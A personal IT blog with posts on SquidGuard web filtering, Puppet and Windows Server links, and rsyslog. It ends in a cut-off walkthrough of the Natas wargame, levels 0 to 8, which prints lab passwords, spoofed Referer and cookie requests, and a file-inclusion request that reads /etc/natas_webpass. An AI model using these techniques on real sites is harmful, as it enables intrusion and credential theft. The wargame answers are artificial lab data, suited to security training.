Thursday, 19 April 2018

Installing SquidGuard on CentOS 7.x

Get Berkeley DB 4.6.21:
wget http://download.oracle.com/berkeley-db/db-4.6.21.tar.gz

cd db-46..
cd build_unix
../dist/configure 
make
make install

ln -s /usr/local/BerkeleyDB.4.6 /usr/local/BerkeleyDB


export LD_RUN_PATH=/usr/local/BerkeleyDB/lib ./configure
./configure
make
make install

Get the blacklist form here:
http://www.shalla.de/service.html

Create static lists to squidGuard db: 
ln -s /opt/3rdparty/BL/anonvpn /usr/local/squidGuard/db
ln -s /opt/3rdparty/BL/hacking /usr/local/squidGuard/db
ln -s /opt/3rdparty/BL/dating /usr/local/squidGuard/db
ln -s /opt/3rdparty/BL/gamble /usr/local/squidGuard/db
ln -s /opt/3rdparty/BL/movies /usr/local/squidGuard/db
ln -s /opt/3rdparty/BL/music /usr/local/squidGuard/db
ln -s /opt/3rdparty/BL/porn /usr/local/squidGuard/db
ln -s /opt/3rdparty/BL/sex /usr/local/squidGuard/db
ln -s /opt/3rdparty/BL/spyware /usr/local/squidGuard/db
ln -s /opt/3rdparty/BL/tracker /usr/local/squidGuard/db
ln -s /opt/3rdparty/BL/urlshortener /usr/local/squidGuard/db
ln -s /opt/3rdparty/BL/violence /usr/local/squidGuard/db
ln -s /opt/3rdparty/BL/warez /usr/local/squidGuard/db
ln -s /opt/3rdparty/BL/weapons /usr/local/squidGuard/db

SquidGuard configuration:
dbhome /usr/local/squidGuard/db
logdir /usr/local/squidGuard/log

dest anonvpn{
         log             anonvpn
         domainlist      anonvpn/domains
         urllist         anonvpn/urls
 }

dest hacking{
         log             hacking
         domainlist      hacking/domains
         urllist         hacking/urls
 }

dest dating{
         log             dating
         domainlist      dating/domains
         urllist         dating/urls
 }


dest gamble{
         log             gamble
         domainlist      gamble/domains
         urllist         gamble/urls
 }

dest movies{
         log             movies
         domainlist      movies/domains
         urllist         movies/urls
 }

dest music{
         log             music
         domainlist      music/domains
         urllist         music/urls
 }

dest porn{
         log             porn
         domainlist      porn/domains
         urllist         porn/urls
 }



dest spyware{
         log             spyware
         domainlist      spyware/domains
         urllist         spyware/urls
 }

dest tracker{
         log             tracker
         domainlist      tracker/domains
         urllist         tracker/urls
 }

dest urlshortener{
         log             urlshortener
         domainlist      urlshortener/domains
         urllist         urlshortener/urls
 }

dest violence{
         log             violence
         domainlist      violence/domains
         urllist         violence/urls
 }

dest warez{
         log             warez
         domainlist      warez/domains
         urllist         warez/urls
 }

dest weapons{
         log             weapons
         domainlist      weapons/domains
         urllist         weapons/urls
 }


acl {
  default {
   pass !anonvpn !hacking !dating !gamble !movies !music !porn !spyware !tracker !urlshortener !violence !warez !weapons all
   redirect 302:http://www.google.com
  }
 }



Switch of SELinux /etc/sysconfig/selinux, enter:
# vi /etc/sysconfig/selinux

And set / update it as follows:
SELINUX=disabled

chkconfig squid on

You will have to compile the lists in order for squidGuard to work with them. Removing and compiling stuff from the DB:
cd /usr/local/squidGuard/db
grep -r "example.com"
/usr/local/bin/
./squidGuard -C movies/domains
service squid restart

In Squid config:
# Try connecting to first 25 ips of domain name
forward_max_tries 25
#squidGuard
redirect_program /usr/local/bin/squidGuard -c /usr/local/squidGuard/squidGuard.conf
url_rewrite_bypass off
url_rewrite_program /usr/local/bin/squidGuard -c /usr/local/squidGuard/squidGuard.conf
#debug_options ALL,1 29,1


Wednesday, 18 April 2018

Puppet Picks

Some great puppet picks if you want to use Puppet or write modules to it or install Foreman.

Modules:
https://forge.puppet.com/ghoneycutt?utf-8=%E2%9C%93&sort=&page=3
https://forge.puppet.com/saz/rsyslog
https://forge.puppet.com/puppetlabs/firewall
https://forge.puppet.com/razorsedge/network
https://www.youtube.com/channel/UC_BpuLm5IvV2tme4WSHEdgw
https://wiki.infn.it/progetti/cloud-areapd/best_practices/config_puppetrun

Writing modules:
http://www.bogotobogo.com/DevOps/Puppet/puppet_locking_user_accounts_deploying_sudoers_file.php
https://www.linode.com/docs/applications/puppet/create-puppet-module
https://www.linode.com/docs/applications/puppet/install-and-configure-puppet

Installation:
http://prolinuxhub.com/install-forman-on-centos-7/
http://www.linuxtechi.com/install-and-configure-foreman-on-centos-7-x/
http://www.itzgeek.com/how-tos/linux/ubuntu-how-tos/install-foreman-on-centos-7-rhel-7-ubuntu-14-04-3.html
http://www.ehowstuff.com/disable-ipv6-on-redhat-centos-6-centos-7/
https://www.linode.com/docs/applications/puppet/install-and-configure-puppet
https://ask.puppet.com/question/2451/how-do-you-change-the-runinterval/
https://linuxconfig.org/puppet-agent-exiting-no-certificate-found-and-waitforcert-is-disabled-solution
http://devopspy.com/devops/install-puppet-master-agent-on-centos-7/
http://opensourceforu.com/2011/01/data-centre-automation-puppet-resources-types-examples/
https://docs.puppet.com/puppet/latest/install_linux.html

Rsyslog UDP/TCP

There is a small, but important catch when you configure rsyslog - the protocol at the end of the config. For the classic UDP set on @ for TCP @@

# The authpriv file has restricted access.
authpriv.*                                              /var/log/secure

# Log all the mail messages in one place.
mail.*                                                  -/var/log/maillog


# Log cron stuff
cron.*                                                  /var/log/cron

# Everybody gets emergency messages
*.emerg                                                 :omusrmsg:*

# Save news errors of level crit and higher in a special file.
uucp,news.crit                                          /var/log/spooler

# Save boot messages also to boot.log
local7.*                                                /var/log/boot.log

$ActionQueueFileName fwdRule1 # unique name prefix for spool files
$ActionQueueMaxDiskSpace 1g   # 1gb space limit (use as much as possible)
$ActionQueueSaveOnShutdown on # save messages to disk on shutdown
$ActionQueueType LinkedList   # run asynchronously
$ActionResumeRetryCount -1    # infinite retries if host is down
# remote host is: name/ip:port, e.g. 192.168.0.1:514, port optional
*.* @IP:514

References:
https://devops.profitbricks.com/tutorials/configure-remote-logging-with-rsyslog/
http://unix.stackexchange.com/questions/280697/rsyslog-not-forwarding-messages-to-remote-rsyslog-server
http://serverfault.com/questions/667728/configure-and-test-rsyslog-to-udp-socket
http://xmodulo.com/configure-rsyslog-client-centos.html

Tuesday, 10 October 2017

Microsoft Infrastructure Foundamentals

Some references I gathered over time on Microsoft Windows Administration.

Happy reading,
Yuriy

Server Limits Specifications:
https://msdn.microsoft.com/en-us/library/windows/desktop/aa366778(v=vs.85).aspx#physical_memory_limits_windows_server_2012

Logical CPU Limits:
https://blogs.technet.microsoft.com/matthts/2012/10/13/windows-server-sockets-logical-processors-symmetric-multi-threading/

Windows Server Comparison:
https://www.thomas-krenn.com/en/wiki/Windows_Server_2012_Editions_comparison


Articles:
Default gateways
https://technet.microsoft.com/en-us/library/cc779696(v=ws.10).aspx

DNSSEC:
https://technet.microsoft.com/en-us/library/jj200221.aspx

DNS Records:
https://technet.microsoft.com/en-us/library/cc958958.aspx

Domains:
https://technet.microsoft.com/en-us/library/cc780856(v=ws.10).aspx
https://technet.microsoft.com/en-us/library/bb629410.aspx
https://technet.microsoft.com/en-us/library/dd197461
https://technet.microsoft.com/en-us/library/cc780661
https://technet.microsoft.com/en-us/library/cc730756
https://technet.microsoft.com/en-us/library/cc754345.aspx
https://technet.microsoft.com/en-us/library/cc725590.aspx
https://technet.microsoft.com/en-us/library/cc771255(v=ws.11).aspx
https://technet.microsoft.com/en-us/library/cc755131.aspx
https://technet.microsoft.com/en-us/library/ee683907(v=ws.10).aspx
https://technet.microsoft.com/en-us/library/cc753579.aspx

Zones:
https://technet.microsoft.com/en-us/library/cc771898.aspx
https://technet.microsoft.com/en-us/library/cc816885(v=ws.10).aspx
https://technet.microsoft.com/en-us/library/cc779197(v=ws.10).aspx
https://technet.microsoft.com/en-us/library/ee649181(v=ws.10).aspx
https://technet.microsoft.com/en-us/library/cc775397(v=ws.10).aspx

Cache Locking:
https://technet.microsoft.com/en-us/library/ee649148(v=ws.10).aspx

IP Addreses:
https://technet.microsoft.com/en-us/library/cc958825.aspx
https://technet.microsoft.com/en-us/library/bb726995.aspx
https://technet.microsoft.com/en-us/library/cc958834.aspx
https://technet.microsoft.com/en-us/library/cc940018.aspx

DHCP:
https://technet.microsoft.com/en-us/library/cc738472(v=ws.10).aspx
https://technet.microsoft.com/en-us/library/cc783103(WS.10).aspx
https://technet.microsoft.com/en-us/library/hh831825.aspx
https://technet.microsoft.com/en-us/library/cc958946.aspx
https://technet.microsoft.com/en-us/library/cc958935.aspx
http://www.tcpipguide.com/free/t_DHCPLeaseRenewalandRebindingProcesses-2.htm
http://www.thenetworkencyclopedia.com/entry/dynamic-host-configuration-protocol-dhcp/
https://technet.microsoft.com/en-us/library/cc779610(v=ws.10).aspx

What Are Domains and Forests?
https://technet.microsoft.com/en-us/library/cc759073(v=ws.10).aspx

Active Directory Administrative Center: Getting Started:
https://technet.microsoft.com/en-us/library/dd560651(v=ws.10).aspx

Understanding Sites, Subnets, and Site Links:
https://technet.microsoft.com/en-us/library/cc754697.aspx

Privileged Access Management for Active Directory Domain Services:
https://docs.microsoft.com/en-us/microsoft-identity-manager/pam/privileged-identity-management-for-active-directory-domain-services

Install and Deploy Windows Server 2012 R2 and Windows Server 2012:
https://technet.microsoft.com/en-us/library/hh831620.aspx

Migrating Roles and Features in Windows Server:
https://technet.microsoft.com/en-us/windowsserver/jj554790.aspx

Linking GPOs to Active Directory Containers:
https://msdn.microsoft.com/en-us/library/aa374339(v=vs.85).aspx

Designing OU Structures that Work:
https://technet.microsoft.com/en-us/magazine/2008.05.oudesign.aspx

Active Directory Best Practice: OUs and Containers:
http://www.trivalentgroup.com/2015/11/active-directory-best-practice-ous-and-containers/

Active Directory Schema Tools and Settings
https://technet.microsoft.com/en-us/library/cc757747(v=ws.10).aspx

What Is the Global Catalog?
https://technet.microsoft.com/en-us/library/cc728188(v=ws.10).aspx

What Is the Active Directory Schema?
https://technet.microsoft.com/en-us/library/cc784826(v=ws.10).aspx

Resets the Directory Services Restore Mode (DSRM) password
https://technet.microsoft.com/en-us/library/cc754363(v=ws.11).aspx

Performing an Authoritative Restore:
https://technet.microsoft.com/en-us/library/cc940334.aspx

Performing a Nonauthoritative Restore of a Domain Controller
https://technet.microsoft.com/en-us/library/cc784922(v=ws.10).aspx

Understanding Trusts:
https://technet.microsoft.com/en-us/library/cc736874(v=ws.10).aspx

Ntdsutil
https://technet.microsoft.com/en-us/library/cc753343.aspx

Server Manager Technical Overview:
https://technet.microsoft.com/en-us/library/cc753319.aspx

Managing Windows Server 2012 and Windows Server 2012 R2 with Remote Server Administration Tools:
https://blogs.technet.microsoft.com/ausoemteam/2015/03/21/managing-windows-server-2012-and-windows-server-2012-r2-with-remote-server-administration-tools/

Recovering Active Directory Domain Services:
https://technet.microsoft.com/en-us/library/cc816751(v=ws.10).aspx

Requirements for Active Directory Recycle Bin:
https://technet.microsoft.com/en-us/library/dd379484(v=ws.10).aspx

Active Directory Recycle Bin Step-by-Step Guide:
https://technet.microsoft.com/en-us/library/dd392261(v=ws.10).aspx

Group types:
https://technet.microsoft.com/en-us/library/cc781446(v=ws.10).aspx

Default groups:
https://technet.microsoft.com/en-us/library/cc756898(v=ws.10).aspx

Nesting groups:
https://technet.microsoft.com/en-us/library/cc776499(v=ws.10).aspx

Active Directory Security Groups:
https://technet.microsoft.com/en-us/library/dn579255(v=ws.11).aspx

Managing Computers:
https://technet.microsoft.com/en-us/library/cc771682.aspx

Detailed Concepts: Secure Channel Explained
http://social.technet.microsoft.com/wiki/contents/articles/24644.detailed-concepts-secure-channel-explained.aspx

Group Policy Overview
https://technet.microsoft.com/en-us/library/hh831791.aspx

Performance Team Blog:
https://blogs.technet.microsoft.com/askperf/

SMB:
https://blogs.technet.microsoft.com/josebda/2013/10/02/windows-server-2012-r2-which-version-of-the-smb-protocol-smb-1-0-smb-2-0-smb-2-1-smb-3-0-or-smb-3-02-are-you-using/

Bitlocker:
https://technet.microsoft.com/en-us/library/cc766200%28v=ws.10%29.aspx

https://technet.microsoft.com/en-us/library/cc732774.aspx

https://technet.microsoft.com/en-us/library/jj679890.aspx

Storage Technologies:
https://technet.microsoft.com/en-us/library/dn610883.aspx
https://technet.microsoft.com/en-us/library/hh831739.aspx
https://blogs.technet.microsoft.com/josebda/2014/11/19/storage-spaces-survival-guide-links-to-presentations-articles-blogs-tools/
https://technet.microsoft.com/windows-server-docs/storage/storage-spaces/storage-spaces-direct-windows-server-2016
https://blogs.technet.microsoft.com/askpfeplat/2012/10/10/windows-server-2012-storage-spaces-is-it-for-you-could-be/
https://technet.microsoft.com/windows-server-docs/storage/software-defined-storage/storage-quality-of-service
https://technet.microsoft.com/en-us/library/hh831602.aspx


Hands on:

Deduplication:
https://blogs.technet.microsoft.com/canitpro/2013/04/29/step-by-step-enabling-data-deduplication-on-windows-server-2012-volumes/

iSCSI:
https://blogs.technet.microsoft.com/filecab/2012/05/21/introduction-of-iscsi-target-in-windows-server-2012/

Bitlocker:
http://accc.uic.edu/answer/how-do-i-configure-active-directory-store-bitlocker-recovery-information

DHCP:
https://technet.microsoft.com/en-us/library/cc732075.aspx
https://technet.microsoft.com/en-us/library/cc757682(v=ws.10).aspx
https://technet.microsoft.com/en-us/library/cc779507(v=ws.10).aspx
https://technet.microsoft.com/en-us/library/dn425039.aspx
https://technet.microsoft.com/en-us/library/cc786474(v=ws.10).aspx
https://blogs.technet.microsoft.com/teamdhcp/2009/01/22/how-to-configure-split-scope-using-wizard/
https://blogs.technet.microsoft.com/teamdhcp/2012/09/03/dhcp-failover-hot-standby-mode/
http://www.serverlab.ca/tutorials/windows/network-services-windows/step-step-creating-windows-server-dhcp-scope/
https://technet.microsoft.com/en-us/library/dd759168(v=ws.11).aspx
https://technet.microsoft.com/en-us/library/hh831385(v=ws.11).aspx

DNS:
https://technet.microsoft.com/en-us/library/cc754941
https://blogs.technet.microsoft.com/networking/2008/03/19/dont-be-afraid-of-dns-scavenging-just-be-patient/
https://technet.microsoft.com/en-us/library/ff807360(v=ws.10).aspx
https://technet.microsoft.com/en-us/library/cc816657(v=ws.10).aspx
https://technet.microsoft.com/en-us/library/ee649174(v=ws.10).aspx

Storage Spaces: How to configure Storage Tiers with Windows Server 2012 R2:
https://blogs.technet.microsoft.com/askpfeplat/2013/10/20/storage-spaces-how-to-configure-storage-tiers-with-windows-server-2012-r2/

Installing and Configuring MPIO:
https://technet.microsoft.com/en-us/library/ee619752(v=ws.10).aspx

Installing and Configuring Microsoft iSCSI Initiator:
https://technet.microsoft.com/en-us/library/ee338480(v=ws.10).aspx

Switch between Full and Server Core in Windows Server 2012 using PowerShell 3.0:
https://blogs.technet.microsoft.com/puneetvig/2012/10/15/switch-between-full-and-server-core-in-windows-server-2012-using-powershell-3-0/

How to change default OU for computers in AD:
https://blogs.technet.microsoft.com/canitpro/

Install a New Windows Server 2012 Active Directory Child or Tree Domain (Level 200):
https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/deploy/install-a-new-windows-server-2012-active-directory-child-or-tree-domain--level-200-

http://pc-addicts.com/server-2012-change-default-ou/

Step-by-Step: Enabling and Using Fine-Grained Password Policies in AD
https://blogs.technet.microsoft.com/canitpro/2013/05/29/step-by-step-enabling-and-using-fine-grained-password-policies-in-ad/

How To Enable the Active Directory Recycle Bin:
https://redmondmag.com/articles/2015/11/11/enable-the-active-directory-recycle-bin.aspx

Step-By-Step: Setting Up Active Directory Sites, Subnets & Site-Links
https://blogs.technet.microsoft.com/canitpro/2015/03/03/step-by-step-setting-up-active-directory-sites-subnets-site-links/

Getting Started with Nano Server:
https://technet.microsoft.com/windows-server-docs/compute/nano-server/getting-started-with-nano-server

Get started with Setup and Boot Event Collection
https://technet.microsoft.com/windows-server-docs/compute/get-started-with-setup-and-boot-event-collection

Evaluation:
https://www.microsoft.com/en-us/evalcenter/evaluate-windows-server-2012?wt.mc_id=DXLEX_EDX_INF500x

ADSI Edit (adsiedit.msc)
https://technet.microsoft.com/en-us/library/cc773354(v=ws.10).aspx

Remote Server Administration Tools for Windows 10

How to Install Service Manager on a Single Computer
https://technet.microsoft.com/en-us/library/hh519747(v=sc.12).aspx

Promoting DC:
https://www.interworks.com/blog/ijahanshahi/2014/01/06/promoting-windows-2012r2-server-domain-controller

Configure Remote Desktop Access on Windows 7 Systems:
https://technet.microsoft.com/en-us/magazine/ff404238.aspx

Special Identities
https://technet.microsoft.com/en-us/library/dn617202.aspx

PS AD DS:
https://technet.microsoft.com/en-us/library/hh852274(v=wps.630).aspx

Use the Wbadmin Backup Command Line Utility in Windows Server 2008:
https://technet.microsoft.com/en-us/magazine/dd767786.aspx

Backing Up Active Directory Domain Services:
https://technet.microsoft.com/en-us/library/cc816584(v=ws.10).aspx

Offline Domain Join (Djoin.exe) Step-by-Step Guide
https://technet.microsoft.com/en-us/library/offline-domain-join-djoin-step-by-step(v=ws.10).aspx

Delegate Permissions for Group Policy
https://technet.microsoft.com/en-us/library/dn789195.aspx

Create a new organizational unit
https://technet.microsoft.com/en-us/library/cc785077(v=ws.10).aspx

Creating the Security Group
https://technet.microsoft.com/en-us/library/cc732782(v=ws.10).aspx

Creating Roaming Profiles:
http://www.grouppolicy.biz/2010/08/best-practice-roaming-profiles-and-folder-redirection-a-k-a-user-virtualization/

Power-shell stuff:
https://technet.microsoft.com/en-us/library/ee617253.aspx
https://technet.microsoft.com/en-us/library/ee617258.aspx
https://technet.microsoft.com/en-us/library/ee617210.aspx
https://technet.microsoft.com/en-us/library/ee617245.aspx
https://technet.microsoft.com/en-us/library/jj574143.aspx
https://technet.microsoft.com/en-us/library/jj612821(v=wps.630).aspx
https://technet.microsoft.com/en-us/library/hh826098(v=wps.630).aspx
https://technet.microsoft.com/en-us/library/jj612803%28v=wps.630%29.aspx
https://technet.microsoft.com/en-us/library/hh826099%28v=wps.630%29.aspx
https://technet.microsoft.com/en-us/library/hh848689(v=wps.630).aspx
https://technet.microsoft.com/en-us/library/hh848686(v=wps.630).aspx
https://technet.microsoft.com/en-us/library/hh831434.aspx
https://technet.microsoft.com/en-us/library/hh848450.aspx
https://technet.microsoft.com/en-us/library/hh831700.aspx
https://technet.microsoft.com/windows-server-docs/networking/dns/what-s-new-in-dns-server
https://technet.microsoft.com/en-us/library/jj590751(v=wps.630).aspx
https://technet.microsoft.com/en-us/library/jj590743(v=wps.630).aspx

Thursday, 3 August 2017

Review eLearnSecurity eJPT, eCPPT

Currently I have been holding some penetration testing certifications from eLearnSecurity and passed them:
  • eJPT
  • eCPPT


I would like to share my experience here. 

About the labs, the labs they are quite different in approach compared to other certifications - the orientation is to skills rather to CTF targets. Personally I found it better choice since you learn quite a lot in a very short time (if you are dedicated). Not having free time - my only option was to learn in early morning 6 am to 8 am. After holding the  eJPT I was able to pass also the eCPPT within a month.

Most important takeaways during the learning process:
- Do all the labs.
- Try to automate tasks and repeat the labs with the automated tools you have created.
- Know the flaws of your tools.
- Document everything and be organized.
- Read.
- Advance.

Labs

During the labs I found that some of the tools I use have changed in time, to be specific Metasploit. There are lots of online resources regarding Metasploit so this is not a big issue, but it will waste your time if you have not done you research. For example I was really surprised that some windows post exploitation tools are not supported anymore. So do you research in advance. Also try to understand how it can be done manually - for instance X tool does not work, as a work around I can export registry key Y, decrypt password Z etc. 

"This lab does not work as expected" - Find the reason why. This might happen and you can get support from the forums and search the older topics to resolve your issue. My suggestion is to simulate the environment and understand how the attack works - locally, recreation of situations helps a lot to understand the circumstances you are dealing with and in most cases it can be just a setting you have overlooked.

Knowledge domains

In a nutshell eJPT gives you the ground knowledge, eCPPT is a deep-dive into the penetration testing world and also you get to practice "Exploit Development" - which itself is a huge knowledge domain. Pivoting is also a technique you have to master it is widely used and also will be of great advantage for yourself - you have to know, how you can "move" between networks. All topics are widely covered both theoretically and practically, my advice would be to take the practical part more seriously.

As they state: 

eJPT:
  • Good knowledge of TCP/IP
  • Good knowledge of IP routing
  • Good knowledge of LAN protocols and devices
  • Good knowledge of HTTP and web techologies
  • Essential penetration testing processes and methodologies
  • Basic Vulnerability Assessment of Networks
  • Basic Vulnerability Assessment of Web Applications
  • Exploitation with Metasploit
  • Simple Web application Manual exploitation
  • Basic Information Gathering and Reconnaissance
  • Simple Scanning and Profiling the target
                    eCPPT:
                    • Penetration testing processes and methodologies
                    • Vulnerability Assessment of Networks
                    • Vulnerability Assessment of Web Applications
                    • Advanced Exploitation with Metasploit
                    • Performing Attacks in Pivoting
                    • Web application Manual exploitation
                    • Information Gathering and Reconnaissance
                    • Scanning and Profiling the target
                    • Privilege escalation and Persistence
                    • Exploit Development
                    • Advanced Reporting skills and Remediation



                    Exams

                    Surprisingly fun, have not had that much fun in years. If you have done the labs you can not go wrong. If you have issues during the lab you can reset it, but remember that you will have to re-exploit all of your targets - automate as much as possible. Some of the targets are harder, but in time you will find your way in. The biggest advantage of both exams is that there is plenty of time. For eJPT as far as I remember 3 days for my criteria 24 h for this level is more than enough. eCCPT the exam was really interesting I completed it in 3 days including the report writing, but usually you get a week for the exam and a week for the report. In both exams you will get to test your learned skills, so again do the labs - properly.

                    About the penetration testing report for eCCPT. The report is the most interesting part - you will have to organize all of your information and prepare a detailed analysis, it is best to get it done manually if you want to have a good report and pass the exam.

                    Tools

                    You are not limited in any way.

                    References:



                    Thursday, 19 January 2017

                    Natas Level 0 to 10

                    This document is for educational purposes only, I take no responsibility for other peoples actions. This is a review of  Natas Level 0 to 10:
                    http://overthewire.org/wargames/natas/

                    L 0

                    <html>
                    <head>
                    <!-- This stuff in the header has nothing to do with the level -->
                    <link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
                    <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
                    <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
                    <script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
                    <script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
                    <script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
                    <script>var wechallinfo = { "level": "natas0", "pass": "natas0" };</script></head>
                    <body>
                    <h1>natas0</h1>
                    <div id="content">
                    You can find the password for the next level on this page.

                    <!--The password for natas1 is gtVrDuiDfck831PqWsLEZy5gyDz1clto -->
                    </div>
                    </body>
                    </html>

                     L1
                     Chrome -> Ctrl+U
                     <html>
                    <head>
                    <!-- This stuff in the header has nothing to do with the level -->
                    <link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
                    <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
                    <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
                    <script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
                    <script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
                    <script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
                    <script>var wechallinfo = { "level": "natas1", "pass": "gtVrDuiDfck831PqWsLEZy5gyDz1clto" };</script></head>
                    <body oncontextmenu="javascript:alert('right clicking has been blocked!');return false;">
                    <h1>natas1</h1>
                    <div id="content">
                    You can find the password for the
                    next level on this page, but rightclicking has been blocked!

                    <!--The password for natas2 is ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi -->
                    </div>
                    </body>
                    </html>

                    L2
                    <html>
                    <head>
                    <!-- This stuff in the header has nothing to do with the level -->
                    <link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
                    <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
                    <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
                    <script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
                    <script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
                    <script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
                    <script>var wechallinfo = { "level": "natas2", "pass": "ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi" };</script></head>
                    <body>
                    <h1>natas2</h1>
                    <div id="content">
                    There is nothing on this page
                    <img src="files/pixel.png">
                    </div>
                    </body></html>

                    http://natas.labs.overthewire.org/js/wechall-data.js
                    var wechalldata = {
                        "natas0": 1,
                        "natas1": 2,
                        "natas2": 3,
                        "natas3": 4,
                        "natas4": 5,
                        "natas5": 6,
                        "natas6": 7,
                        "natas7": 8,
                        "natas8": 15,
                        "natas9": 14,
                        "natas10": 13,
                        "natas11": 12,
                        "natas12": 11,
                        "natas13": 10,
                        "natas14": 9,
                        "natas15": 16,
                        "natas16": 17,
                        "natas17": 18,
                        "natas18": 137,
                        "natas19": 138,
                        "natas20": 139,
                        "natas21": 140,
                        "natas22": 141,
                        "natas23": 142,
                        "natas24": 213,
                        "natas25": 214,
                        "natas26": 215,
                        "natas27": 216
                    }

                    http://natas2.natas.labs.overthewire.org/files/
                    [IMG] pixel.png 2016-06-25 11:58 303
                    [TXT] users.txt 2016-06-25 12:42 145

                    # username:password
                    alice:BYNdCesZqW
                    bob:jw2ueICLvT
                    charlie:G5vCxkVV3m
                    natas3:sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14
                    eve:zo4mJWyNj2
                    mallory:9urtcpzBmH


                    L3:
                    User-agent: *
                    Disallow: /s3cr3t/

                    http://natas3.natas.labs.overthewire.org//s3cr3t/users.txt
                    natas4:Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ

                    L4:
                    Burp -> Proxy -> Intercept On -> Add -> Refferer natas5.natas.labs.overthewire.org

                    Access granted. The password for natas5 is iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq

                    L5:
                    GET / HTTP/1.1
                    Host: natas5.natas.labs.overthewire.org
                    Cache-Control: max-age=0
                    Authorization: Basic bmF0YXM1OmlYNklPZm1wTjdBWU9RR1B3dG4zZlhwYmFKVkpjSGZx
                    Upgrade-Insecure-Requests: 1
                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Accept-Encoding: gzip, deflate, sdch
                    Accept-Language: bg,en-US;q=0.8,en;q=0.6
                    Cookie: __cfduid=ddd2731304b504d954af409bf2c0724731481120164; loggedin=1
                    DNT: 1
                    Connection: close

                    <html>
                    <head>
                    <!-- This stuff in the header has nothing to do with the level -->
                    <link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
                    <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
                    <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
                    <script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
                    <script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
                    <script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
                    <script>var wechallinfo = { "level": "natas5", "pass": "iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq" };</script></head>
                    <body>
                    <h1>natas5</h1>
                    <div id="content">
                    Access granted. The password for natas6 is aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1</div>
                    </body>
                    </html>

                    L6:
                    <html>
                    <head>
                    <!-- This stuff in the header has nothing to do with the level -->
                    <link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
                    <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
                    <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
                    <script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
                    <script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
                    <script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
                    <script>var wechallinfo = { "level": "natas6", "pass": "<censored>" };</script></head>
                    <body>
                    <h1>natas6</h1>
                    <div id="content">

                    <?

                    include "includes/secret.inc";

                        if(array_key_exists("submit", $_POST)) {
                            if($secret == $_POST['secret']) {
                            print "Access granted. The password for natas7 is <censored>";
                        } else {
                            print "Wrong secret";
                        }
                        }
                    ?>

                    <form method=post>
                    Input secret: <input name=secret><br>
                    <input type=submit name=submit>
                    </form>

                    <div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
                    </div>
                    </body>
                    </html>

                    http://natas6.natas.labs.overthewire.org/includes/secret.inc
                    <?
                    $secret = "FOEIUWGHFEEUHOFUOIU";
                    ?>

                    Access granted. The password for natas7 is 7z3hEENjQtflzgnT29q7wAvMNfZdh0i9

                    L7:

                    <html>
                    <head>
                    <!-- This stuff in the header has nothing to do with the level -->
                    <link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
                    <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
                    <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
                    <script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
                    <script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
                    <script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
                    <script>var wechallinfo = { "level": "natas7", "pass": "7z3hEENjQtflzgnT29q7wAvMNfZdh0i9" };</script></head>
                    <body>
                    <h1>natas7</h1>
                    <div id="content">

                    <a href="index.php?page=home">Home</a>
                    <a href="index.php?page=about">About</a>
                    <br>
                    <br>

                    <!-- hint: password for webuser natas8 is in /etc/natas_webpass/natas8 -->
                    </div>
                    </body>
                    </html>

                    http://natas7.natas.labs.overthewire.org/index.php?page=/etc/natas_webpass/natas8
                    DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe

                    L8:
                    <html>
                    <head>
